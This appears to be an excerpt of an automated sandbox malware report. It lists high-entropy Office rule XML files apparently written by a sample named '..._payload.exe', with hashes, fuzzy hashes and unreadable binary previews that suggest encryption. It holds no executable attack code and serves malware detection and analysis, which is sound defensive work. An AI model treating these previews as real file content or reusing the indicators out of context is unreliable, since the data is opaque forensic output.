                                                                                                      Malicious:false
                                                                                                      Preview:<?xml........OX.%q.A.ts\\.<....".8..c.g.K..........{.4.?..>...6.Q,ay#..Jh^...].[.....'Jk.q....fy.@..y..Q5....X.-K..b?.....$3....!Aj...B........&..K....Jw.....,~o"....=....F!.&g....(.....!.N..5.R.....69+...I....T.gOV2.JL..O.X.....;..d..#.5x.[.R{.......c.7u.6.0C....'.....r...0......X...C....4..0W!U.p-Y........t....o..>...u{tw....G.0%.u.....$.."x...[D..b.$.;1.........S..:.^......Xq.....O.\M...irE....}...\.b.....,...n_...2!W.L.yq.....8.#.,.....wL+.....!.-.c|.Lx..gX.....o.e.v..|..N....>!.........<..k. XTk.m.U.>x.F.C..(q.H....0Vm.`b.....w.......+H.Sx7v.....1..,....X"..Jbi.q.&.....t.|I..p6#9.rLC|dG7....g.4......\.=..... .S....nb".) ..?...k....K.S..|...rd.$....{Xe..Y.>}..=...oo...I|..N..g..9%.#w.!,.s..96.?u...........$..s.J...i..p.9........~.......z.!.C.<N.`....i..08.i.....~.y.......?.... ....U..5L#......l.8.6..x)......y._...#..h.6..g.+...-:.....g.%.U.......A......9;...........!Tg.Iz.4.x...Dk*AeA..>.V.H..m.Q..X.k.......m..k[.C9k...ZDEf

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63041v2.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1815
                                                                                                      Entropy (8bit):7.896607062251775
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:ggnF17iVNaO4H/1VAmv/NZi8Cm34QCxayL0PUJ/UTj9peDrAZ7p5WBuarov6bD:geFkVNodVRW8j4QwNgPKru7pYsa8wD
                                                                                                      MD5:A31FA6FA66BBF150FFED56B1D240F209
                                                                                                      SHA1:8321D11F4B52475BA0BAD3AB85632D992290A4CB
                                                                                                      SHA-256:DBC567A39D958EB02151F4E58A2FF7132ECCF6A41845A15EA3D422D69E53AC73
                                                                                                      SHA-512:FFC43B431B7784ACC541138DAF9D1912450D59E900F359313E1FABD423FF6C50FC4B128068AAAE95687FC81375F4BE9822EFEC4AA0324A859AEAAD6F52E379E0
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml0Q.9D.T.l.%q.4...r...G..Y..vp8.w.o,0...t^b.,S.K.)...N...^.4....(E..{g.3..l....p"..f..H+t.a......g....Hq....?..3&C.v.#.a....|0hq.j.G*.,.K..%y("..M<7r..6d. b...C..r.......n.......z.z?..@.h..$O..8Ko.".....\l.#......."`.#....<....^r....1o.%.....q.....7.....;...L..+bnx......a...\.....V<e.L......q.E...i^....6~.jb.\..r7I..... .2..([t...y..:k..@...".h."'Q'.5"..]..P...=C.+c.k5..s...S....$k.!1.Z.b..]....y*&W.,ol..0.YJ.....&.u..........A.LS^....+.....7y...h.M.......v...h...Y7. .B.,^........?.R..T.U...j9l..YP.1.?..x..q9.0'......@...bF.QA....6..j..........{.Q.67.sk.....C.....-./tm.<T...<.X...8..r.v)......0.I{{..c.........|dAzI...6..b..&....g..^...T...l...2.......>.....a. ...W..d..`.Q...6\.P...@SF....>.Mw_.....+`.M}.m0-.U...3A6S..'.>.J..U..1...x../-.'..."..j.z...fl}9K.&....@.L..2.B...]...=.~h%..'........$.O...?G!.....M..|...5#`.U......s..2*)Jc.E...n^..x..*...b..[4.H.2..W.....R..qw.....q.Q)k.W.D..#.z?w...a.p.B$.+ ..h...vG].C...b.*..m

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63042v3.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1004
                                                                                                      Entropy (8bit):7.781514069357566
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:4KcQteIrWPlpdWuL9riowRarTUp6YgVjFP2aoaoYJw80v6bD:3cQt7spJgorTUPiFWF80wD
                                                                                                      MD5:473235CD75CEA2C248BD28537F34B3FC
                                                                                                      SHA1:6F9623D1FE6A972D759891EDEF8B5F5E76C64C11
                                                                                                      SHA-256:1E3DC2EED85E2E2054E72BE61E2D01FAAA75E81CCDEFBF6E06925F58DC6A0717
                                                                                                      SHA-512:9D1508914A14963A9288E4C1EED4C27C0630DE5FF8116FBB0208813D66A72A44EC8211C0478F6D34FCFD0F454259133F7423DD4D968045F3DC8856ECF9A40A6B
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..;a.v.XQ.V.Q.........x.-.Za..C...=P.(.y0.....6......7.S.........&e&.+v..=.y.J~.\._..G.q..3... ....9.N..G..i.5...7s.D...:.#..?...Z......./.E..gD.3..s.d.p.a.'........W!xN.v..........%.k..x..Y..f.-....Z.o....f...P.....w.q4..X[o..p.m.'..'.Oi......%Y./..\...x....8.$.....9.........M.K.|2.#8. ....(n...2......k...#N..`}..J.fo!w...O..S.....\%..A.0.<.B]E.R..q.L..Np..@.k|............R.U..H&.....sc.l.x)-[.T.m(g7..j..)i!.($.E.p..B..M..>.WA........l'.H..o.2..ta.?..t....<-.m./...7J.Pv...60{`..n=..{u:.t...... ...b../[..*.!..9. .o...%..-.....$.TE..:.. ......@..z.}JP.....,...X.Y.....S..X.uC.,.....Zu....p.4.S:.......;.]|/8.......8.9.z.......Io.\..v45....T.Z.........26G...;.23.AdF.@..B./Y.GGm.6|...k..~..%h...$.......$^.Yo....I/..v..^.$c>Y.....q....1I.#..tj3B..@1..o...{F{...9...7.G.......\.^s..Y........fu....N.zn.........$5...u..M^Z...;.m.up.yt=.2........c.....&.. d..m. .....hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63046v10.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1950
                                                                                                      Entropy (8bit):7.886771019285277
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:eluIAL0DZObeKcWBpBQOy16GDU04BwuZBJsSMgwD:KuIAA9ObeQBQOUxihMZ
                                                                                                      MD5:E5418AB7692957BEEEF8D9503720C452
                                                                                                      SHA1:9421169229DA8695C818BDAF7E63B5152C4B3D16
                                                                                                      SHA-256:235EC9EC208D02419E2DBC2B7BFB4EB46A0F687AEEA0ADF18E5882BA90E36C39
                                                                                                      SHA-512:0E640076F4E61771BDE2990BBC15CC8407B6F0899246D1214BBBBC0AE57AC4CEF259C3165F1FF2172A274AA13ADCC3CC23227705687D8364F119E1AD48A3B99E
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlz.jTt#w.g...c`i..5.*..-.3]..@0j.O......4..n.S....Q*3.......%..w... .EP(d...n..*.v,E!.....3.>.A.......).4.....WJ.o...mL2".>.O....0....F=.....gW5]......H.{%..'.......l.O..<..N..q.V.p....ThC.=..E....l...)...,.^.r...[.'........a\.o..q..[#.....z....<e.......M5...Sy@.($..$.&...a...^eJ.h...@~w.@p.....>..._.>b'.Op..p!..'.&.Y....l.....,..D....l....#_{85_....#......W....1.b..AA.Q......v..n../.L......?.%....u,G.w.8....q.G%.d..6en......^f1%o...>$....2%..ymB[EQ#.x.u2(n.W...'.....#.G}2.".1p....j<.Al......k...,]...Y9..~.v.L&i...z[_@.....S{BIp.....0.#=...c..>2...A...P......../.. s!;F\.4.....O.n4".P.2..G..wD..j6.Fl.6..E......y.....T.h1:....#.."...zZ.+.n.G.p..j..?G..3.]...9../.Y......1..............f:@.5.K.@.=uN.e.{...,`;...0.U..*.;....B.|.W).I..(-..;...\....I+..M<....x.P$<..........c}..K....R..*..n...XR&O.RXr.^U...V.YT1.L.v...FubE..5s]K`..../..6.]..M..W.0.._Xy...8B.'....{.|...e.*G.eE....`s.a`..-.0fx.s(.n...k]>Jj.H..h.....NF..Y.....@.SiLG<a.<.+.p'.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63048v6.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):4121
                                                                                                      Entropy (8bit):7.953375927779071
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:wLIQ5ztUXdPV9IOiZohKdikJrC/mHDewIYI/XuTmwFn+:wRRuXd/InQkJO/Ye2I4F+
                                                                                                      MD5:66F57959E8A420888C648E0B657A1009
                                                                                                      SHA1:284560B6C304A7D9FB58645A7D2F6DD74A9FA3F6
                                                                                                      SHA-256:7E28DD0B1E5D1F7617275BE2EE02E5622A8A6E7BFB9265F02A3B35903A0B5475
                                                                                                      SHA-512:4B2476D1F7DE4222B02CCD31B9F7DF105EDD65F37FF9BCBECAD59655C6A54F7D6AF525CDD6735D026C06EFC3B287E5A32CB8849120184DF7403C3C3621AF695B
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlM......~g|..bS.B...1..U..h..h..r........D.E.n';..@..q'm.0...Po......!....6e"...q..X.'..~....I(.k.Y../m.XT.C.z...p...GH.o...I....[....].L.. ..)R.}.a;..x........%..X.......,.~?.;....s{..........M.a.Y.3[..K.....nL.D.V.W.~.3>....\o.....BY.....@...W.e.x...O....s.{.?....+..&~....+T..4..`N.b...f.4.'c31>...*^5i....&>.Z.\>z.....p.3..?#...M4..pn.5.z.s.2.EF...s.1........d..i+..v...u..,.HoN,...._...&....{.C..>..U...cf.....I.E1.NG..vo..e*q....+..1..jG.]...n.A(....|.3....|h..I.B)..hj"l.......ZA+.fC.e.z.k.l?.d.}kr.v..d....B....'..D..~....l...........U.~..W~z.-.9.c:;I....|'b8Y5..p....*....M."..:.......Y.......B...@i<...5Hu.0.ia....GH..^.$EO..VE-#".}6*.4/....8..._\..5.#.>..w.HU1..^...a....mt.Z...g......4.'7a....8/...N.P.&.E...wq.[E..W..[....|$.'y.. {..S7Z..f...]..p_'..L.}z.M%.#.........A.o...?C..[..u.j...\p...33..f.<x.~.W.^%.......Jki.>.....f....8.."..5..........%!x....N..m..H>3.T.C.....b/.C..('.....'o...[...q.!.@>.......j8o;.."..R.t.u..........{..%...

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63049v2.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1585
                                                                                                      Entropy (8bit):7.86845477891286
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:f1mc3VHJQ2I5kKbn2Hl3dq+5vQJ51lUfEJoP9FO3v1QVidzfbVMgiqz2l/EcxnBy:fscFHJTI6Kb2ukvIlCFIQV+bb1CJBRwD
                                                                                                      MD5:1FE54F979857CFBC799D2BECB343D87B
                                                                                                      SHA1:E11AF99EFE8C5A6F601CAE64965AAB8DEB0D37B4
                                                                                                      SHA-256:AB8921EB6F386EA05F2D22BA732D5E5193CDC5DE2BA4AE380549A91D9503FF26
                                                                                                      SHA-512:CDB8E95E5BB9CFA1C2492591D9EDA575A83B9A50CDD3E50970D846BFD08F5FB6D1161CAFF9CAE9035CA02571AF5AA28BC60F6D991860E6E465394FFCA7444A28
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml#....G.......JdF....,$....5,..}..p|\.m...[.#.>....d....k..F..%8E..R.>C..].D..1_|.....T.Q..0;.rX...?.....8.`......0...S....x..\..u..l.k....-.HB.qd.*...E....:.....9p.-.O.GT....5[..Q.R/|1.+.?T.....DS^..$G....6........[D.O.8W5.-X?...!.1U"o..R...\......{.t..[....MF..c...r..s3.......j....|.^^6G.X... n......6........n~..+...Y......)j.d.M.....!+Yk9....$...n.l...Ox....!..e........'O\........g.^...(.4....,&...]lrdH7.....\./.t\...S.2J..50.D.j8.H.)}....A...&t..s.J......@.....| .,....4...6...+.....m...........9$...g..\..M..8.v.CPM...l..;..9.d.....I....2t.<...,..b.7.....Kn..M..........<.....nT].-.G.3.3..2q.-.....1...LK....4y.)9._}...?..(.U.8hpp9......E.rvD...%+`t;.A.j..!&...\..8u.2']......j.-~U.y2...R..<,.K....'<0...a....q3i^2....M7.q..o...+...2O3@....vJF..P....35.0S.`...../]..j%.N.%..!T..s..=L/...!x.....N.!.....g...Ho....c.:.[VFHza.1.la.&.>w.!,.\.....'.T....sn2V...Y..&.%..:..^.....D....6Bd.Z.M. TCB..D...:...<-p..Iy?.f.U.Q.3nm..).x..OFK.t..M..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63051v5.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1939
                                                                                                      Entropy (8bit):7.894943745915157
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:dIoZkg8+E2ojBSlBcvRiqbZ7BQtPjhvk6rNiNwD:5kg8+ETtKcvZBitPjFkeI+
                                                                                                      MD5:241B1FC1AA65D28AB9FF727E864D211B
                                                                                                      SHA1:00EE8B6F8921CE057980E8AEF49D2E1DC6994B7B
                                                                                                      SHA-256:EA459B51E1C6193B050A48199DE44D466E6F2B95BF47692A8F34389F2EC86329
                                                                                                      SHA-512:19508C66CA837DED69FA9138CBF0713C912163D78703CB96B7619CBE87AF4EB91AFD7FD97831E2CEC99BDDD0A420E7901B3ADDA7A7BB83E920401B511D19871D
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.$......-.<}..4...t...G.IkXke$.b.p...J..._:.u.7-51.m....k{"..2a......b..(....2...>.P..I-.....0Y.....:F.TGm.S..m..p5...8....fN......w.k.O.f~+.=Q.LB@..]..8$.....G...s.~._.R...-.Z.-.V.....l.^...y`P.......KLJ.\..L..hE.......$._..yu...U.U4..=.R....E.i.i...<.$l.i..; ..Y..3YK..'*......0/....E.b..}Q.*...L....@VG..,.SU..@(s..M..+..1.E]....M..q. M..8]O......e..$......fy..Wv8...m..tf..V\.=.p..N.U.8.G.....?......f?...cH......@.x...*.P.......,.J.)y.......!........w:..z87.5Z......ef]>w....+.6..vZ+...w...t...."\t..\.....C.J9..C.8..>..g....@...%.&8..U.'C....G:...l..D..*.V?.,.u.B.... ......3.T].v..$Lx....?4.e10....3....>..C.(....3......ru...r.k2'..N.].......+.h ..+.X^......M.......".p.Ev..Ru...>.*...F.77.. .>.9C...1..E..Y....2.......~tY.....r..........G.]..........&..Gp.s^1.|van.S]..^9.........a....f..t.I..L...]-.-. p1.....J..,...}..I..X...jpin.K/..4.....$....KA..*.X..-.TG6rb..>.:`.G..P.7v.Q.&.#.._....^,"...*{..1x1.}.......Y>.&..p...=.G...(.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63052v3.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3091
                                                                                                      Entropy (8bit):7.941094464797789
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:Yp+vzb+ufdsK973Me1kaE8qs5Cmxam5NLH79w:++v+1K978eRFzN79w
                                                                                                      MD5:C42C997C2709D63D4F30D7B2932083AC
                                                                                                      SHA1:D0D6732C3BCF42AD4A34D6FD319F5981E1B1851E
                                                                                                      SHA-256:3417068F97D65C91C598AA49C079D5E70537693CDE82A0792B8231E5665964C0
                                                                                                      SHA-512:D9B0BD1F635F04D8CED56F8E3FF8735C6C9172FD02A7CD4A8DF09DED2415AE841F37C4417D4D4B19543BEF05A4A9764A6FFF27B9F7E260F9ACF9FAF714D29DF1
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..n.KPD`F.^...*.O.)......qd.._w.PJ&.J...E..|!....Hy..........kR3jd.....N.C...s.e.0<...N.>..Y.._.&C.0.2.Ax=.{?.O..a..V.W.5...u8A.gn...........0.6%..T?..U.E....0.O.c..Q.S..g3.J....<...m....2.N.M+.}}.o..O@&s.N.......G)|..T,..Iw.6...J...zV.U.o...aHa?L3..l...c..l..d...C.s&...:.n.p.q).@.].2..3L)glK.>r.v......".c.D19........w.4.;.C50.>L..*.h....g.%4hQ<D#..D....9K+.....To...S..0.....$...\..``...F$}....%~..).A....OQb........+...?..{..5........._...n...t^\..L$t....B..fC....7..c.....D..#..W...V.2.D.......7......3...,+6.0.no;.-.sDf..(....<x..:r.V..x..B..i...!._B|.....~[I...4.R.......Cb..I5.a......va.*..I....~.h.?G..$_;.l^..gq;L...7.>uY.SK....@.=.T5.<F::..v..1....C?Q_d.....S.=..D.p...6..r....x~..`B.*kQ]T.eF.....:...%B.......Q.8-R$H.c*..!.oZ..`..msKY..Q,....k.p.c..z...^.|..r.....h3.......N....9...R...c..`.di`{4..{....*..zh/....a5&.6.....l..$....v..&.x..e..e.......<.G...s.J5f.ZX...:......{.w.g|..K."]4.w....H.Z.k.....f.J.H......~4|A..%r9.t#....~....5.z.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63053v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):980
                                                                                                      Entropy (8bit):7.782484089301965
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:4pr8jfZxqprfwi3Suj4ZE+vwQlP8wv6bD:+8lxwoi14yEww7wD
                                                                                                      MD5:A8BE967E7BD02849C0C54E5CD81414E2
                                                                                                      SHA1:2904AEF8D8062204C69B438169D16DBC857B7D38
                                                                                                      SHA-256:5510B5D983E03B25D8AD70D43366C299900FD5F993E3FC45D871899B5B5D8E29
                                                                                                      SHA-512:E5A8538910F3B4012607205E4F7D7668AB63C625AF374EEACF54BE02C6BF7AF937EC47F240A66C5432ED473E52B8F8D650C0D30B56854B328FA7A2ED73B0E5CF
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.X..d.S...3.ROs..cs.X.......S>j....M....4WC..K.?V#.)z=..d|.....r~.T..I....y.k.c..^nS#vz....9.....lX.v.."*E..h0.0............jv....WXh.e.Ms....t..&.y...{!.P....rOI?.m*`...E.M...<...|8..-o..(...*.?....o:....W./g.;.../_Z....*.8,$..w...*.C.[.9F.@.i..4....x%..AT......M......}...p...{.,M.!..W....g..J.m._..|t..&WEq\..[....h...(/PC ci..7.|.2..`N..5..nr.,....S..9_..3...pp...J..g...'.e...F...Z........O..pK..y.J.=.....~p...z..vh.-4-. ....0.V>.....=..b.1..,.R=UyU$.e.........0.....ERP..p..:.I.8.c.a.1W.k{.U.1u......N.!.1.o......C{..?/.P..O?...,MQV..1.....;[m....5B..r..s.8Nc*@4..A.T...8...G.....m.2....B..b.Q ...a...Dl.D..0K2'.....w....&cU..oc...u.~.bIv.x.Z...a.HL)...`!K..P.'HvV..|.D..SBrI..tQ..G(.._q.C...v.......-@D*......".W.Y.s.J...7.DE3l.d.y..'.........j..R['.#.)X....5Rq.)lwKhC.;..]..AdzT.f......A......7.l..G.....itu.=....+...S.5g.QO?$.7.c&.../.L..hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63054v5.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2404
                                                                                                      Entropy (8bit):7.8981310168399395
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:S+yUn2i7GNJoSi9LYs6qDeycbiabdvWNCXLtOXibwDVgXzwD:S+yc2dNJJwPxc7U0XLtI/DVgI
                                                                                                      MD5:69C275554EDBEE250607729D6580F2FC
                                                                                                      SHA1:394B3D42D44064AF42E609CE1C20629CC336B32F
                                                                                                      SHA-256:D6261D2FBD86EBE28E8D319991A9606FE159F7C208D4BF968E62746CA59B7431
                                                                                                      SHA-512:68E406F002350CC5787C2B6D0C587362F1482E856751219EF19CC7F5934A5B55927A91C0673B1499806DDAED4305A0D2308FB6276B19DD481B4ACFB5F7BB489D
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml4..9....H0.FHG.1.v./.-..\.M.]L.....l..$.@.|.&.T6I/....7/..Plee..wM!....i3..&..@M...P.h.-U..z.=m....k.lH>.V;.&&.......Ehx..?...SpP.B....M..-`|......X...3H^......%kk..v..{?..ed+.f.........Y..<E.(8........EY0.5...J .../.p..TH..(..NI.f..A..h...C2~}...X;.V.g.e_5..j[..\.>.g.e>..Q.}....?.%`...ABG..}>.\.b.<...........p/F..\..L.7.7...H..1..6.S..N...u.Wg!.o...@.)...e....}.O.{..d......w..~@.a..F|N.E...'..e P......g`....h.!...ah..w.I....B..!mZ/...z..rx..3..%..}.l.2.....|3FR.."W1..O.+Q...J..=.A.B.............o6.....*h5..0..>.-...:.X!Y.Y......d;..X..t[].v.Q.X...IE_z.Q.../Yni..R.J2.s.....cU.f$.}.D$..A$.".\...XLV......].!.5...M..W$UI..X.f].+.. .s..K..=U.,.7.Y....p.....YSe.....A..M..-|...9vC...5{.~...O...LQ..'....R.Q.....";...>.......p-.<O.2.}..6...7...z@.{.)...!...).z^*..*>k........u.o..BBE......(.e!.6....}...[$.=\Y..;.|L;{..o#.7..u/.,..w.>fN.j .~.)N_[".+.j.j$X P..).fZ&:.9:\......r'.f6a..[..5N.....#.}.p..~:.i....WQU.,h.5...E/....W..L..DC&\..v..q:\`C.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63056v9.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3203
                                                                                                      Entropy (8bit):7.94784264362606
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:jhPL4B0Fd9yR+ekGu1OC+QeqwLoQR+cnL:jZLm0FdAIeKb+waV
                                                                                                      MD5:E807B359F96DB09CB45C45E1EAF66343
                                                                                                      SHA1:85690CC707A34B0DD398B9851EBEAA7F2FA28A4C
                                                                                                      SHA-256:8700A1BA99E5D25FC530B8DA98C05F81025C57F92E24184A161ACB3BF8CA9686
                                                                                                      SHA-512:F26046FEB8DBE5A000CF7E138C9D52DC3C6D6651C1383FE6563711C31C4176DCA660CFCA3FD68DA94D869FB79AFA5FDD694A23CF0E65757B023B67D160B90EC8
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.p......x..=/...e.u..X&.C...N....Y.o....3m,8.7..<..j.....q..D.._f....lS....~$.U+3#....,/.....B...N.U0...b..GSh..25..+...4...AV.3.........?M......~..u...4....!..p,i....c./.u.3..%..}.....-...7.".q.#x.......4f...............B\.2.=igt..x.......<...A...Dy.oB..32...h...e..{I.t(..!.H.....5KR.5....3......W._&k.5..F.......1...r>J....~gs|.........b..Z....d.'..k.@....w.TY4ae.a....xiYZz.?.......?.....W .A..s..W..lQ..#.\l....#...#._.1tO.. O.9..]@).}S].o+...j....|.=:]G4'.l.M,)..{a...]....}...#.3..ky.$..ZH..R),.....5^n.......M....i..............y..4.#.J....x)<Wg..2...=.p....GINt...=.\.E./...#..3...`...l.R..'>.....!..vf........rU.X..7... .=..Tf.".H.. ....p.Y....O.N.$..a.._zy<..}8.$.=..0..C2.}D......."{|...t..2...J.\L..!pVEh.....h.?n...H(u..V9....t.......-.h!.|C..w..{..._|.!YW$M)1n..".r.l.Jr....-..y..'..5z.v.....z..R3.....t..A.....i.l.1..K)`C..~....>.S...C...^#.=r=M...2..n'n.o.aw.oL.><...<,?+........$...I...7G..'*#wi8...{...F..y........zTQ....`.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63057v3.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2512
                                                                                                      Entropy (8bit):7.926623038148512
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:I+qjJWS8jcg1pITbeKkVbv/3h8PwHTASj8sEDp0cxNy4m6VuqwD:I+mLgcgQTBk13hZnjJc0cxg
                                                                                                      MD5:C7CE681418FBAFE9CAE70C47F9CCE1A5
                                                                                                      SHA1:10A30770D1F6246BFE16067C7E7AB6CFC1E6414C
                                                                                                      SHA-256:51DD660CF97342D33C7D71CCBF239CC8F04FBBA6924B3ED11351183582FCFC5C
                                                                                                      SHA-512:EB60ACDEF47F1F65243EBAEA15C8B999E68F12AFA4F08E3BCF937E73F1D47A86A1349C2A9AD9166B5DF598B3FDBEB5B457701DE7F526BAC017B16A89B9FBB453
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlt.mPQ..Z.R.-........t.......R9S.4H'?.........4.1.~dv.z .^..q..%P_.".N...8....v.V_rx.~...#...+..f9..O......}....i~D.....r.....7b,..,..X.....{...&.[...t..h...)Ai.=.....y..?W...aY..sY.S..w............7d...... /...o.3.A.]..}b.7.........k..Q.4.B..?w.WdPNE..@Gh..]...2#..[...|.cE.... .2OV....$.v...D....,&..3U.nurB...E.#Y..$.....ezm.!#1[B.........&.q.Y\..A.......[b....~...M..V.3qf.@.%....C.`..oAc.(;.eX...t. ...#e]..tW..8..Zv...-.........j.\..(\.......QP/.7.B..j@..v..7....`1Ar.W./D".Wf.O1...{.g.v%.>..D.7..."~.C~.....n5...b.Xb.v..7.'..l..B.y..?.{....c..^&.../.|X...*...h.U=.T........Z..t.G.....w.j.0b)].M...V..........t.%...x.R.M..cE..L.>..>y.ox...1.....u..-.SY.PP...xt..2.A...*.X.Y..D.V.-...4vNs...I.!?....l.o&JMU..2....T.94}..wE.mb.._Zb.(.8.a.C..^S.....|....9..g9.F..n.x.C=o..d3.v..P.8@.Cu.....Y.......).s.,.w..9LS....Qb.. .....Y..a..1..8......BlK...x3,b.S.;.>'....3Rd.Z@*9nB....4-./Yp....iz...9........EV....<..z..?......(..'g../...m../.c..,.2&..|.....

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63058v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1247
                                                                                                      Entropy (8bit):7.8449539612025525
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:oBvxKHkt/6M1TkoiD+mgLMVXnSB76nHo3drxDAb7llstf0vMUd/85dgv6bD:AxQkt/XtkoBmgLMVXsrrslmqhR85qwD
                                                                                                      MD5:D9C12AB7B8F984DE64A15DD188225477
                                                                                                      SHA1:05916025ABCA1254EACF8F6F98CD95F5A98CB1BF
                                                                                                      SHA-256:BF9014EC301450D21DA6A98360D6095AB12E6C3064539691F757193F6C1E85A7
                                                                                                      SHA-512:CCF0E0084EB65B441C3FC46A8E97A10AA656640B570173476010AD955249D86D93E1BC31550130F520B6C2FFEAE44378897D300E81E146B52AF95ADD554405C6
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.......P..,......<[...5.xP........l.%.Ys..h.Lq....;....]{...y..q....X..,.8..s.....s{.,.......W..d.?.....M.L$...b._.s.Gi.^!.b......vc..f8... ..>.t..P.p...&..K..<SAQ.?P$L..j.[..o.zs..,e....p..o.c.#......UDE.......L..#.p.-c..v.q[|w0r..H...;o.b.......[1#..<..V..........I...u...:I ...........,.BX.......28!4.m...V+r..w..8........\...H.....bu..vbu.mOtg....:3p.1.....o'.O..(....d$.....p..i.;:...W.....vy.e..IL.Q..v..{GU.....d.."jd...X.4..{.u4.%........!.........:....}..1ncn..-wxN.9.YPa...L.0....'...g........Ed/.7..u..;vq.....HQg.h...Dm.I..$...jA.,Vn.67.a+..`.B.U..W:...sP.pl.....b9...r3..9......u.X.g..........1.;..l.......Z......o..H...$.....0,....\&..E.....).... .7w*..-...........@/..n.../e..0........X/Jmg0.....n..,.....*mz.<C. .U.!3....S.yI.5%...Zr,i.x.#..4...9....EV}W..g.8...k.....$.EV...z...`b....;....9k/..J+.}..q..D.#....}.......B+.p.....6.y.....tZ.L.Y....|......f.J.....O.N...s.._.q..@.".a7}."..M.Q..4..........S.GDiI..$=..X..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63059v0.xml

                                                                                                      Download File
